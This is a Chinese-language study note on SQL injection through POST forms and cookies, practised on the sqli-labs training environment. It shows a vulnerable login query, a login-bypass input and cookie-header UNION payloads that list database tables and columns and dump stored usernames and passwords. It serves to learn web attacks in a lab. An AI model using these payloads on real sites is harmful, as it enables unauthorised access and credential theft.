2021-10-26 SQL从提交方式

小迪笔记V14

参数类型:
数字型、字符型、搜索型(%通配符)、Json: 键值对

请求方法:
GET,POST,Request,HTTP头,COOKIE

POST

POST注入通过输入框,例如用户登录,网站留言板块,这些都是通过POST方式发送到服务器。
GET与POST :
GET请求传输的数据比较小,而POST一般不做限制,可以文件上传。
GET请求会经过url编码,而POST不会。
POST不可见,需要抓包。

打开sqlilabs less11
在这里插入图片描述
在输入框中尝试填入闭合:‘ “ )
输入’报错
在这里插入图片描述
查看sql拼接语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

构造闭合语句

用户名输入框:‘ or 1=1 #

or 条件有真为真,所以用户名就算为假,select语句也为真。
在这里插入图片描述
随便输入,看到它的payload

uname=123&passwd=213&submit=Submit

在这里插入图片描述
使用hackbar提交POST
在这里插入图片描述
抓包方法
在这里插入图片描述
在这里插入图片描述
接下来就和GET请求一样获取用户密码…

Cookie
输入admin admin 抓包,加引号测试报错
在这里插入图片描述
引号闭合,测试字段…
在这里插入图片描述
显示位
union前面要为假
在这里插入图片描述
查询当前数据库所有的表

Cookie: uname=an' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()#

在这里插入图片描述
查看users表里的所有字段

Cookie: uname=an' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name = 'users'#

在这里插入图片描述
查看 username password

Cookie: uname=an' union select 1,group_concat(username,0x7e,password),3 from security.users #

在这里插入图片描述

Request
全部接收

网络安全基础

相关

网络安全基础

标签